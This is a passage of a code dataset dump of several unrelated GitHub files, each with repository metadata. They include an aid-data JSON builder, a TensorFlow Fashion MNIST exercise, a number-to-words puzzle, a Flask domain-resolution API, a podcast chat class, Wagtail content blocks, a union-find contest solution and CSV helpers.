adict['Africa_ODA_Over_All_ODA_Over_GNI'] = adict['Africa_ODA_Over_All_ODA'] * adict['All_ODA_Over_GNI']\n # adict['In_Donor_Refugee_Over_GNI'] = adict['In_Donor_Refugee_Over_All_ODA'] * adict['All_ODA_Over_GNI']\n\n\n # Append dict to array\n 
arr.append(adict)\n\n # Insert array in data type dict\n datatype_obj[x[0]] = arr\n\n datatype_dict[x[0]] = datatype_obj[x[0]]\n\n obj[c] = datatype_dict\n nested_data['data_one'][c] = obj[c]\n\n # Add recommendations for each country\n nested_data['data_one'][c]['recommendations'] = recs_dict[c]\n\n\n# Create dummy annotations\nnested_data[\"annotations\"] = annotations['annotations']\n# languages = ['english', 'german', 'french']\n#\n# for l in languages:\n# nested_data[\"annotations\"][l] = {}\n# nested_data[\"annotations\"][l]['selector_page'] = {\n# \"title\": \"Country profiles\",\n# \"intro_line\": \"This is an intro line\",\n# \"instructions\": \"Click on a country to find out more\",\n# \"legend_target_met\": \"ODA / GNI target met\",\n# \"legend_target_not_met\": \"ODA / GNI target not met\"\n# }\n# nested_data[\"annotations\"][l]['country_profile_page'] = {\n# \"country_name\": \"Country Name\",\n# \"context_chart_title\": \"Aid over time\",\n# \"context_chart_selector\": \"Show proportion of aid going to:\",\n# \"context_chart_button_1\": \"LDC\",\n# \"context_chart_button_2\": \"AFRICA\",\n# \"context_chart_button_3\": \"IN-DONOR\",\n# \"target_chart_title\": \"Targets\",\n# \"target_chart_met\": \"Target met\",\n# \"target_chart_not_met\": \"Target not met\",\n# \"key_stats_table_title\": \"Key statistics\",\n# \"key_stats_table_local_currency\": \"GBP\",\n# \"key_stats_table_row_1_title\": \"Global\",\n# \"key_stats_table_row_2_title\": \"ODA to LDCs\",\n# \"key_stats_table_row_3_title\": \"ODA to Africa\",\n# \"recommendations_title\": \"Recommendations\",\n# \"recommendations_1\": \"This is a sample recommendation 1\",\n# \"recommendations_2\": \"This is a sample recommendation 2\"\n# }\n#\n# # Country specific variables\n# nested_data[\"annotations\"][l]['country_profile_page']['currencies'] = {\n# \"Australia\": \"AUD\",\n# \"Canada\": \"CAD\",\n# \"EU member states\": \"EUR\",\n# \"EU member institutions\": \"EUR\",\n# \"France\": \"EUR\",\n# \"Germany\": \"EUR\",\n# \"Italy\": \"EUR\",\n# \"Japan\": \"JPY\",\n# \"Netherlands\": \"EUR\",\n# \"Sweden\": \"SEK\",\n# \"United Kingdom\": \"GBP\",\n# \"United States\": \"USD\",\n# }\n#\n# nested_data[\"annotations\"][l]['country_profile_page']['country_names'] = {\n# \"Australia\": \"Australia\",\n# \"Canada\": \"Canada\",\n# \"EU Countries\": \"EU member states\",\n# \"EU Institutions\": \"EU member institutions\",\n# \"France\": \"France\",\n# \"Germany\": \"Germany\",\n# \"Italy\": \"Italy\",\n# \"Japan\": \"Japan\",\n# \"Netherlands\": \"Netherlands\",\n# \"Sweden\": \"Sweden\",\n# \"United Kingdom\": \"United Kingdom\",\n# \"United States\": \"United States\",\n# }\n#\n# pprint(nested_data[\"annotations\"] )\n#\nwith open('country_profiles_nested_v5.json', 'w') as outfile:\n json.dump(nested_data, outfile, indent=4, separators=(',', ': '), ensure_ascii=False)\n","repo_name":"kate-one/DATA_Report_2017","sub_path":"data_report_viz/nest.py","file_name":"nest.py","file_ext":"py","file_size_in_byte":5895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23707428466","text":"import tensorflow as tf\n\n# Lataa Fashion MNIST datasetti ajamalla tehtävän ensimmäinen solu.\n(train_X, train_y), (test_X, test_y) = tf.keras.datasets.fashion_mnist.load_data()\n\n#%%\n# Luo alla olevan kuvan mukainen neuroverkkomalli.\nmodel_cnn = tf.keras.Sequential([ \n tf.keras.layers.InputLayer((28,28,1)),\n #tf.keras.layers.Dense(1, input_shape=(28,28,1), activation='relu'), # Tarvittava 
neuronien määrä nähdään kuvasta \"output\" - kentästä\n    #tf.keras.Input(shape=(28,28,1)),\n    tf.keras.layers.Conv2D(24, kernel_size=(5,5), activation='relu', strides=1, padding='same'),\n    tf.keras.layers.MaxPooling2D(pool_size=(2,2), strides=(2,2)),\n    tf.keras.layers.Dropout(0.2),\n    tf.keras.layers.Conv2D(48, kernel_size=(5,5), activation='relu', strides=1, padding='same'),\n    tf.keras.layers.Dropout(0.4),\n    tf.keras.layers.Conv2D(64, kernel_size=(5,5), activation='relu', strides=1, padding='same'),\n    tf.keras.layers.MaxPooling2D(pool_size=(2,2), strides=(2,2)),\n    tf.keras.layers.Flatten(),\n    tf.keras.layers.Dense(256, activation='relu'),\n    tf.keras.layers.Dense(10)\n])\n# Lataa malliin painoarvot \"weights.h5\" tiedostosta.\nmodel_cnn.load_weights('weights.h5')\n# Tehtävän toteutus tähän\n#%%\n# Conv2D tarvitsee kanavadimension, joten data muotoillaan muotoon (N, 28, 28, 1).\ntrain_X = train_X.reshape((train_X.shape[0],28,28,1))\ntest_X = test_X.reshape((test_X.shape[0],28,28,1))\nprint(train_X.shape)\n# Poista äskeisessä tehtävässä luodusta mallista klassifikaatiokerrokset. (eli Flatten ja kaikki sen jälkeiset kerrokset)\n# layers[-4] on viimeinen MaxPooling2D-kerros, joten Flatten ja sen jälkeiset kerrokset jäävät pois.\nmodel_cnn2 = tf.keras.Model(inputs = model_cnn.input,\n                            outputs = model_cnn.layers[-4].output)\n#model_cnn2.summary()\n\n\n# Jäädytä loput kerrokset.\nfor layer in model_cnn2.layers:\n    layer.trainable = False\n\nmodel_cnn2.summary()\n\n# Luo klassifikaatiokerrokset ja lisää ne malliin.\nflatten = tf.keras.layers.Flatten()(model_cnn2.output)\nnew_dense1 = tf.keras.layers.Dense(256,activation='relu')(flatten)\nnew_output = tf.keras.layers.Dense(10,activation='softmax')(new_dense1)\n# tehdään uusi malli olio\nmodel_cnn3 = tf.keras.Model(inputs = model_cnn2.input,\n                            outputs = new_output)\n#model_cnn3.summary()\n\n\n#%%\n# Kouluta mallia Fashion MNIST datasetillä muutama kierros (epoch) käyttäen train_X ja train_y koulutusdataa.\n# train_y sisältää kokonaislukuluokkia (0-9), joten käytetään sparse_categorical_crossentropy-häviötä.\nmodel_cnn3.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])\n\nmodel_cnn3.fit(train_X, train_y, epochs=4, batch_size=5)\n\nresults = model_cnn3.evaluate(test_X, test_y)\n\n# Aja tehtävän viimeinen \"Vastaukset\" solu.\n#%%\n# Tehtävän vastaukset. Huom! Älä muokkaa tätä solua, vaan aja se, kun olet suorittanut tehtävän. 
Sijoita results - muuttujaan funktion model.evaluate() tulos.\n# Muista määrittää model.compile() - funktioon seurattavaksi suureeksi metrics=['accuracy'], jotta näät, kuinka suuri osa neuroverkon ennustuksista on oikein.\nprint(f\"Test Loss:{results[0]} Test Accuracy:{results[1]*100}%\")","repo_name":"TapaniAlastalo/data_analytics","sub_path":"syvaoppiminen/koodit/osa2/t4b.py","file_name":"t4b.py","file_ext":"py","file_size_in_byte":3470,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1170683715","text":"FIRST_TEN = [\"zero\", \"one\", \"two\", \"three\", \"four\", \"five\", \"six\", \"seven\",\n \"eight\", \"nine\"]\nSECOND_TEN = [\"ten\", \"eleven\", \"twelve\", \"thirteen\", \"fourteen\", \"fifteen\",\n \"sixteen\", \"seventeen\", \"eighteen\", \"nineteen\"]\nOTHER_TENS = [\"twenty\", \"thirty\", \"forty\", \"fifty\", \"sixty\", \"seventy\",\n \"eighty\", \"ninety\"]\nHUNDRED = \"hundred\"\n\n#Your code here\n#You can import some modules or create additional functions\n\n\ndef checkio(number):\n #Your code here\n #It's main function. Don't remove this function\n #It's using for auto-testing and must return a result for check.\n d1 = {'0':'', '1':'one', '2':'two', '3':'three', '4':'four', '5':'five', '6':'six', '7':'seven', '8':'eight', '9':'nine', '10':'ten', '11':'eleven', '12':'twelve', '13':'thirteen', '14':'fourteen', '15':'fifteen', '16':'sixteen', '17':'seventeen', '18':'eighteen', '19':'nineteen'}\n d2 = {'2':'twenty', '3':'thirty', '4':'forty', '5':'fifty', '6':'sixty', '7':'seventy', '8':'eighty', '9':'ninety'}\n\n data = number\n string = ''\n hun = data/100\n remind = data%100\n if hun >= 1:\n string += d1[str(hun)] + ' hundred '\n tenth = remind/10\n if tenth >= 2:\n string += d2[str(tenth)]\n remind = remind%10\n if remind > 0:\n string += ' ' + d1[str(remind)]\n else:\n string += d1[str(remind)]\n #replace this for solution\n# return 'string representation of n'\n string = string.strip()\n return string\n#Some hints\n#Don't forget strip whitespaces at the end of string\n\n\n#These \"asserts\" using only for self-checking and not necessary for auto-testing\nif __name__ == '__main__':\n assert checkio(4) == 'four', \"1st example\"\n assert checkio(133) == 'one hundred thirty three', \"2nd example\"\n assert checkio(12) == 'twelve', \"3rd example\"\n assert checkio(101) == 'one hundred one', \"4th example\"\n assert checkio(212) == 'two hundred twelve', \"5th example\"\n assert checkio(40) == 'forty', \"6th example\"\n","repo_name":"liuminzhao/checkio","sub_path":"number.py","file_name":"number.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"22462531435","text":"from flask import make_response\nfrom utils.resolver import resolve_host\nfrom utils.domains import Domain\nimport re\n\ndomains = {}\ncustom_domains = {}\nDOMAIN_VALIDATION_RE = r'(([\\da-zA-Z])([_\\w-]{,62})\\.){,127}(([\\da-zA-Z])[_\\w-]{,61})?([\\da-zA-Z]\\.((xn\\-\\-[a-zA-Z\\d]+)|([a-zA-Z\\d]{2,})))'\nIP_VALIDATION_RE = r\"^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$\"\n\ndef check_custom_domain_kw(required, **kwargs):\n \"\"\"\n Checks Domain and IP are present in the kwargs\n \"\"\"\n print(f\"Los kw son {kwargs}\")\n for req in required:\n if req not in kwargs:\n return False\n return True\n\n\ndef resolve_and_store(domain):\n ttl, addrs = resolve_host(domain)\n if addrs:\n new = Domain(domain=domain, addrs=addrs, ttl=ttl, custom=False)\n 
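# cache the resolved entry so later lookups can reuse it until the TTL expires\n        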
domains[domain] = new\n return new\n else:\n return None\n\n\ndef obtener_dominio(domain):\n \"\"\"\n Maneja el `/api/domains/`\n \"\"\"\n if domain in custom_domains:\n print(\"Existe el dominio custom\")\n return make_response(custom_domains[domain].as_dict(), 200)\n elif domain in domains:\n print(\"Existe el dominio\")\n obj = domains[domain]\n if not obj.expired:\n return make_response(obj.as_dict(), 200)\n\n\n # Ese bloque se ejecuta si no se encontró el dominio, o se encontró y se encuentra expirado\n # Intento resolverlo\n print(f\"Intento resolver dominio {domain}\")\n if not re.match(DOMAIN_VALIDATION_RE,domain):\n print(\"Error en el formato del dominio\")\n return make_response({'error': \"Invalid format for domain\"}, 400)\n try:\n new = resolve_and_store(domain)\n if not new:\n # No se pudo resolver\n return make_response({'error': \"domain not found\"}, 404)\n except Exception as e:\n return make_response({'error': \"Exception while resolving query for domain name (%s)\" % str(e) }, 400)\n return make_response(new.as_dict(), 200)\n\n\ndef create_custom_domain(**kwargs):\n body = kwargs.get('body')\n if not check_custom_domain_kw(required=('domain', 'ip'), **body):\n return make_response({'error': 'Missing data'}, 400)\n domain = body.get('domain')\n ip = body.get('ip')\n if not re.match(IP_VALIDATION_RE,ip):\n print(\"Error en el formato de la IP\")\n return make_response({'error': \"Invalid Format for IP Address (field 'ip')\"}, 400)\n\n if domain in custom_domains:\n return make_response({'error': 'custom domain already exists'}, 400)\n\n obj = Domain(domain=domain, addrs=[ip], custom=True, ttl=0)\n custom_domains[domain] = obj\n\n return make_response(obj.as_dict(), 201)\n\n\ndef modify_custom_domain(**kwargs):\n body = kwargs.get('body')\n domain = kwargs.get('domain')\n if not check_custom_domain_kw(required=('ip',), **body) or \\\n not re.match(IP_VALIDATION_RE, body.get('ip')):\n return make_response({'error': 'payload is invalid'}, 400)\n\n ip = body.get('ip')\n if domain not in custom_domains:\n return make_response({'error': 'domain not found'}, 404)\n\n obj = Domain(domain=domain, addrs=[ip], custom=True, ttl=0)\n custom_domains[domain] = obj\n\n return make_response(obj.as_dict(), 200)\n\n\ndef delete_custom_domain(domain):\n print (\"Domain: %s\" % domain)\n if domain not in custom_domains:\n return make_response({'error': 'domain not found'}, 404)\n\n custom_domains.pop(domain)\n return make_response({'domain': domain}, 200)\n\n\ndef query_domains(q):\n items = []\n for domain, obj in custom_domains.items():\n if q in domain:\n items.append(obj)\n\n response = {'items': [d.as_dict() for d in items]}\n return make_response(response, 200)\n","repo_name":"aleperno/distro-tp1-doh","sub_path":"api/domains.py","file_name":"domains.py","file_ext":"py","file_size_in_byte":3668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74232251666","text":"import datetime\nimport time\n\nimport datasets\n\nfrom src.inf_server import call_inf_server\n\n\n# download podcast database\nds_episodes = datasets.load_dataset(\"dfurman/All-In-Podcast-Transcripts\")\n# download cache conversation databse\n# ds_conversations = datasets.load_dataset(\"dfurman/Chat-All-In-Conversations\")\n\n\nclass Chat:\n default_system_prompt = \"A conversation between a user and an LLM-based AI assistant. 
The assistant gives helpful and honest answers.\"\n system_format = \"<|im_start|>system\\n{}<|im_end|>\\n\"\n\n def __init__(\n self, system: str = None, user: str = None, assistant: str = None\n ) -> None:\n if system is not None:\n self.set_system_prompt(system)\n else:\n self.reset_system_prompt()\n self.user = user if user else \"<|im_start|>user\\n{}<|im_end|>\\n\"\n self.assistant = (\n assistant if assistant else \"<|im_start|>assistant\\n{}<|im_end|>\\n\"\n )\n self.response_prefix = self.assistant.split(\"{}\")[0]\n\n def set_system_prompt(self, system_prompt):\n # self.system = self.system_format.format(system_prompt)\n return system_prompt\n\n def reset_system_prompt(self):\n return self.set_system_prompt(self.default_system_prompt)\n\n def history_as_formatted_str(self, system, history) -> str:\n system = self.system_format.format(system)\n text = system + \"\".join(\n [\n \"\\n\".join(\n [\n self.user.format(item[0]),\n self.assistant.format(item[1]),\n ]\n )\n for item in history[:-1]\n ]\n )\n text += self.user.format(history[-1][0])\n text += self.response_prefix\n\n # stopgap solution to too long sequences\n if len(text) > 4500:\n # delete from the middle between <|im_start|> and <|im_end|>\n # find the middle ones, then expand out\n start = text.find(\"<|im_start|>\", 139)\n end = text.find(\"<|im_end|>\", 139)\n while end < len(text) and len(text) > 4500:\n end = text.find(\"<|im_end|>\", end + 1)\n text = text[:start] + text[end + 1 :]\n if len(text) > 4500:\n # the nice way didn't work, just truncate\n # deleting the beginning\n text = text[-4500:]\n\n return text\n\n def clear_history(self, history):\n return []\n\n # def save_history(self, history):\n # Getting the current date and time\n # dt = datetime.now()\n # dt = str(dt).replace(\" \", \"-\").replace(\":\", \"-\").replace(\".\", \"-\")\n # return history\n\n def turn(self, user_input: str):\n self.user_turn(user_input)\n return self.bot_turn()\n\n def user_turn(self, user_input: str, history):\n history.append([user_input, \"\"])\n return user_input, history\n\n def bot_turn(self, system, history, openai_key, episode):\n episode_num = episode.split(\"(\")[-1].split(\")\")[0]\n conversation = self.history_as_formatted_str(system, history)\n assistant_response = call_inf_server(conversation, openai_key, episode_num)\n history[-1][1] = \"\"\n for chunk in assistant_response:\n try:\n decoded_output = chunk[\"choices\"][0][\"delta\"][\"content\"]\n history[-1][1] += decoded_output\n yield history\n except KeyError:\n pass\n\n def user_turn_select_episode(self, history):\n user_input = \"Special starter call: Display background information for the selected episode.\"\n history.append([user_input, \"\"])\n return history\n\n def bot_turn_select_episode(self, history, episode):\n episode_num = episode.split(\"(\")[-1].split(\")\")[0]\n assistant_response = f\"All-In Episode {episode_num}:\\n\\n\"\n assistant_response += f'Title: {ds_episodes[episode_num][\"episode_title\"][0].replace(episode_num + \": \", \"\")}\\n'\n assistant_response += (\n f\"Date aired: {ds_episodes[episode_num]['episode_date'][0]}\\n\"\n )\n assistant_response += \"Sections:\\n\\n\"\n for itr, section_title in enumerate(ds_episodes[episode_num][\"section_title\"]):\n assistant_response += f\"{itr+1}. {section_title} ({ds_episodes[episode_num]['section_time_stamp'][itr]})\\n\"\n assistant_response += \"\\nYou can now converse with the assistant about this episode! Ask questions about one section at a time. 
Try prompts like:\\n- Summarize section 1\\n- Tell me more info about [insert topic]\\n- What were the key points on [insert topic]\"\n\n history[-1][1] = \"\"\n for character in assistant_response:\n history[-1][1] += character\n time.sleep(0.000075)\n yield history\n","repo_name":"daniel-furman/chat-all-in","sub_path":"src/chat_class.py","file_name":"chat_class.py","file_ext":"py","file_size_in_byte":4785,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"38558299842","text":"#1. Izveidot masīvu, kas satur skaitļus no 1 līdz 10. Izvadīt masīvu uz ekrāna.\n\na=[1,2,3,4,5,6,7,8,9,10]\n\nfor i in range(len(a)):\n print(a[i], end=' ')\nprint()\n\n#2. Izveidot masīvu no dažādiem skaitļiem. Izmantojot ciklu un funkciju pop(), dzēst masīva pēdējos 4 elementus.\n\nfor i in range(4):\n a.pop()\n\nfor i in range(len(a)):\n print(a[i], end=' ')\nprint()\n\n#3. Izmantojot count() un remove(), dzēst visus pieciniekus no masīva.\n\nb = [1,2,5,2,5,8,5,5,9]\n\nfor i in range(b.count(5)):\n b.remove(5)\n\nwhile b.count(5) > 0:\n b.remove(5)\n\n#4. Lietotājs vada skaitļus, kamēr ievada 0. Tiek izveidots masīvs no ievadītajiem skaitļiem.\n\nc = []\nx = int(input('ievadi skaitli: '))\nc.append(x)\nwhile x != 0:\n x = int(input('ievadi skaitli: '))\n c.append(x)\n if x==0:\n c.remove(0)\n\n#5. Izvadīt no masīva tos skaitļus, kas lielāki par ievadīto n.\nn=int(input('ievadi n: '))\nfor i in range(len(a)):\n if a[i] > n:\n print(a[i], end=' ')\nprint()\n\n#6. Izvadīt elementu summu un lielāko elementu, izmantojot ciklus.\n\nsumma = 0\nfor i in range(len(a)):\n summa+= a[i]\nprint('summa: ',summa)\n\nlielakais = a[0]\nfor i in range(1, len(a)):\n if a[i] > lielakais:\n lielakais= a[i]\n\nprint('leilakais elements: ', lielakais)\n#7. Izvadīt pāra skaitļu skaitu masīvā.\n\npss = 0\nfor i in range(len(a)):\n if a[i] % 2 == 0:\n pss += 1\nprint(pss)\n#8. Programma izvada, kur masīvā atrodas lielākais nepāra skaitlis.\n\nindekss = 0\nLNS = 0\nfor i in range(len(a)):\n if a[i] > LNS and a[i] % 2 != 0:\n LNS = a[i]\n indekss = i\nprint('lielākais nepāra skaitlis: ' )\n\n#9. Programma izvada tos pāra skaitļus, kuriem ir pāra indekss/pozīcija masīvā.\n\nfor i in range(len(a)):\n if i % 2 == 0:\n if a[i] % 2 == 0:\n print(a[i], end=\" \")\n\nprint()\n\n#10. 
Ja masīvā ir pāra skaits elementu, izvadīt to no sākuma, citādi izvadīt to no otra gala.\n\nif len(a) % 2 == 0:\n for i in range(len(a)):\n print(a[i], end=' ')\nelse:\n for i in range(len(a)-1, -1, -1):\n print(a[i], end=\" \")\n","repo_name":"huindzive/videne","sub_path":"PyCharm/masīvi/gat.kd..py","file_name":"gat.kd..py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"lv","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31078999485","text":"class Solution:\n def shiftingLetters(self, s: str, shifts: List[int]) -> str:\n stringLen = len(s)\n effect = [0]*stringLen\n \n for i,num in enumerate(shifts):\n effect[0] += num\n \n if i+1 < stringLen:\n effect[i+1]-=num\n \n prefixSum = [effect[0]]\n \n for i in range(1,stringLen):\n prefixSum.append(effect[i]+prefixSum[-1])\n \n answer = []\n \n for i,shift in enumerate(prefixSum):\n char_ord = (ord(s[i])-ord('a') + shift)%26 + ord('a')\n answer.append(chr(char_ord))\n return \"\".join(answer)","repo_name":"Merwan-J/competetive-programming","sub_path":"0848-shifting-letters/0848-shifting-letters.py","file_name":"0848-shifting-letters.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"10814704935","text":"from django import forms\nfrom django.utils.safestring import mark_safe\n\nfrom wagtail.blocks import (\n CharBlock,\n ChoiceBlock,\n FieldBlock,\n RichTextBlock,\n StreamBlock,\n StructBlock,\n TextBlock,\n)\nfrom wagtail.documents.blocks import DocumentChooserBlock\nfrom wagtail.embeds.blocks import EmbedBlock\nfrom wagtail.images.blocks import ImageChooserBlock\nfrom wagtail.snippets.blocks import SnippetChooserBlock\n\nfrom markdown import markdown\nfrom pygments import highlight\nfrom pygments.formatters import get_formatter_by_name\nfrom pygments.lexers import get_lexer_by_name\n\nfrom wagtailio.core.blocks import HighlightBlock, TeaserBlock\n\n# Common Streamfield blocks\n\n\nclass BackgroundColourChoiceBlock(FieldBlock): # To be removed?\n field = forms.ChoiceField(choices=((\"red\", \"Red\"), (\"white\", \"White\")))\n\n\nclass ImageFormatChoiceBlock(FieldBlock):\n field = forms.ChoiceField(\n choices=(\n (\"left\", \"Wrap left\"),\n (\"right\", \"Wrap right\"),\n (\"mid\", \"Mid width\"),\n (\"full\", \"Full width\"),\n )\n )\n\n\nclass SimpleImageFormatChoiceBlock(FieldBlock):\n field = forms.ChoiceField(choices=((\"left\", \"Left\"), (\"right\", \"Right\")))\n\n\nclass HTMLAlignmentChoiceBlock(FieldBlock):\n field = forms.ChoiceField(choices=((\"normal\", \"Normal\"), (\"full\", \"Full width\")))\n\n\n# Code and Markdown blocks https://gist.github.com/frankwiles/74a882f16704db9caa27\n\n\nclass CodeBlock(StructBlock):\n \"\"\"\n Code Highlighting Block\n \"\"\"\n\n LANGUAGE_CHOICES = (\n (\"bash\", \"Bash/Shell\"),\n (\"css\", \"CSS\"),\n (\"django\", \"Django templating language\"),\n (\"html\", \"HTML\"),\n (\"javascript\", \"Javascript\"),\n (\"python\", \"Python\"),\n (\"scss\", \"SCSS\"),\n )\n\n language = ChoiceBlock(choices=LANGUAGE_CHOICES)\n code = TextBlock()\n\n class Meta:\n icon = \"code\"\n template = None\n\n def render_markup(self, value, context=None):\n src = value[\"code\"].strip(\"\\n\")\n lang = value[\"language\"]\n\n lexer = get_lexer_by_name(lang)\n formatter = get_formatter_by_name(\n \"html\",\n linenos=None,\n cssclass=\"codehilite\",\n style=\"default\",\n noclasses=False,\n )\n return mark_safe(highlight(src, lexer, formatter))\n\n def 
get_context(self, value, parent_context=None):\n context = super().get_context(value, parent_context=parent_context)\n context[\"code\"] = self.render_markup(context[\"value\"])\n return context\n\n\nclass MarkDownBlock(TextBlock):\n \"\"\"MarkDown Block\"\"\"\n\n class Meta:\n icon = \"code\"\n\n def render_markup(self, value, context=None):\n md = markdown(\n value, extensions=[\"markdown.extensions.fenced_code\", \"codehilite\"]\n )\n return mark_safe(md)\n\n def get_context(self, value, parent_context=None):\n context = super().get_context(value, parent_context=parent_context)\n context[\"code\"] = self.render_markup(context[\"value\"])\n return context\n\n\n# Main streamfield block to be inherited by Pages\n\n\nclass StoryBlock(StreamBlock):\n h2 = CharBlock(\n icon=\"title\",\n form_classname=\"title\",\n template=\"patterns/components/streamfields/headings/heading-2.html\",\n )\n h3 = CharBlock(\n icon=\"title\",\n form_classname=\"title\",\n template=\"patterns/components/streamfields/headings/heading-3.html\",\n )\n h4 = CharBlock(\n icon=\"title\",\n form_classname=\"title\",\n template=\"patterns/components/streamfields/headings/heading-4.html\",\n )\n paragraph = RichTextBlock(\n icon=\"pilcrow\",\n template=\"patterns/components/streamfields/rich_text_block/rich_text_block.html\",\n )\n blockquote = CharBlock(\n icon=\"openquote\",\n form_classname=\"title\",\n template=\"patterns/components/streamfields/quotes/standalone_quote_block.html\",\n )\n image = ImageChooserBlock(\n icon=\"image\", template=\"patterns/components/streamfields/image/image.html\"\n )\n document = DocumentChooserBlock(\n icon=\"doc-full-inverse\",\n template=\"patterns/components/streamfields/document/document.html\",\n )\n embed = EmbedBlock(\n icon=\"code\", template=\"patterns/components/streamfields/embed/embed.html\"\n )\n markdown = MarkDownBlock(\n template=\"patterns/components/streamfields/code_block/code_block.html\"\n )\n codeblock = CodeBlock(\n template=\"patterns/components/streamfields/code_block/code_block.html\"\n )\n teaser = TeaserBlock(group=\"CTA options\")\n get_started_block = SnippetChooserBlock(\n \"core.GetStartedSnippet\",\n icon=\"th-list\",\n template=\"patterns/components/streamfields/get_started_block/get_started_block.html\",\n group=\"CTA options\",\n )\n sign_up_form = SnippetChooserBlock(\n \"core.SignupFormSnippet\",\n icon=\"envelope-open-text\",\n template=\"patterns/components/streamfields/sign_up_form_block/sign_up_form_block.html\",\n group=\"CTA options\",\n )\n highlight = HighlightBlock()\n\n class Meta:\n template = \"patterns/components/streamfields/content_story_block.html\"\n","repo_name":"wagtail/wagtail.org","sub_path":"wagtailio/utils/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":5185,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"48"} +{"seq_id":"73896679187","text":"'''\nCreated on Jul 7, 2013\n\n@author: Yubin Bai\n\nAll rights reserved.\n'''\n\nimport time\nfrom multiprocessing.pool import Pool\nparallelSolve = False\nINF = 1 << 31\n\n\ndef solve(par):\n\n def neg(num):\n if num >= N:\n return num % N\n else:\n return num + N\n\n def find(i):\n if parent[i] != i:\n parent[i] = find(parent[i])\n return parent[i]\n\n def union(i, j):\n p1 = find(i)\n p2 = find(j)\n if rank[p1] < rank[p2]:\n parent[p1] = p2\n else:\n parent[p2] = p1\n if rank[p1] == rank[p2]:\n rank[p1] += 1\n\n N, cmd = par\n parent = list(range(2 * N)) # friends\n rank = [0] * (2 * N)\n result = []\n for c in 
cmd:\n command, x, y = c\n if command == 1:\n if find(x) == find(neg(y)):\n result.append(-1)\n else:\n union(x, y)\n union(neg(x), neg(y))\n if command == 2:\n if find(x) == find(y):\n result.append(-1)\n else:\n union(x, neg(y))\n union(neg(x), y)\n if command == 3:\n result.append(int(find(x) == find(y)))\n if command == 4:\n result.append(int(find(x) == find(neg(y))))\n\n return '\\n'.join(str(e) for e in result)\n\n\nclass Solver:\n\n def getInput(self):\n self.numOfTests = 1\n self.input = []\n cmd = []\n N = int(self.fIn.readline())\n while True:\n row = map(int, self.fIn.readline().split())\n if row[0] == 0:\n break\n cmd.append(row)\n self.input.append((N, cmd))\n\n def __init__(self):\n self.fIn = open('input.txt')\n self.fOut = open('output.txt', 'w')\n self.results = []\n\n def parallel(self):\n self.getInput()\n p = Pool(4)\n millis1 = int(round(time.time() * 1000))\n self.results = p.map(solve, self.input)\n millis2 = int(round(time.time() * 1000))\n print(\"Time in milliseconds: %d \" % (millis2 - millis1))\n self.makeOutput()\n\n def sequential(self):\n self.getInput()\n millis1 = int(round(time.time() * 1000))\n for i in self.input:\n self.results.append(solve(i))\n millis2 = int(round(time.time() * 1000))\n print(\"Time in milliseconds: %d \" % (millis2 - millis1))\n self.makeOutput()\n\n def makeOutput(self):\n for test in range(self.numOfTests):\n self.fOut.write(\"%s\\n\" % self.results[test])\n self.fIn.close()\n self.fOut.close()\n\nif __name__ == '__main__':\n solver = Solver()\n if parallelSolve:\n solver.parallel()\n else:\n solver.sequential()\n","repo_name":"yubinbai/pcuva-problems","sub_path":"UVa 10158 - War/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"48"} +{"seq_id":"14825263665","text":"import csv\n\ndef naiveCsv(archivo):\n f = open(archivo, \"rt\")\n for linea in f:\n array = linea.split(\",\")\n print(\"Nombre: {}\".format(array[2].strip('\\n')))\n print(\"Apellido paterno: {}\".format(array[0]))\n print(\"Apellido materno: {}\".format(array[1]))\n print(\"=====================================\\n\")\n\n\ndef betterCsv(archivo):\n with open(archivo, \"rt\") as f:\n reader = csv.reader(f)\n for linea in reader:\n print(\"Nombre: {}\".format(linea[2]))\n\n\ndef naiveWriteCsv(registros):\n f = open(\"registros1.csv\", \"wt\")\n for registro in registros:\n f.write(\",\".join(registro) + '\\n')\n f.close()\n print(\"naiveWriteCsv: Archivo csv generado!\")\n\n\ndef betterWriteCsv(registros):\n with open(\"registros2.csv\", \"wt\") as archivo:\n writer = csv.writer(archivo, delimiter='#')\n for registro in registros:\n writer.writerow(registro)\n print(\"betterWriteCsv: Archivo csv generado!\")\n\n\n# mocos\n\n","repo_name":"levinux/cursoPython","sub_path":"dia1/scripts/func_dia4.py","file_name":"func_dia4.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29926662730","text":"###############################################\n#### LOGGING CLASS SETTINGS (py25+, py30+) ####\n###############################################\n#### also will work with py23, py24 without 'encoding' arg\nimport logging\nimport logging.handlers\nf = logging.Formatter(fmt='%(levelname)s:%(name)s: %(message)s '\n '(%(asctime)s; %(filename)s:%(lineno)d)',\n datefmt=\"%Y-%m-%d %H:%M:%S\")\nhandlers = [\n logging.handlers.RotatingFileHandler('rotated.log', 
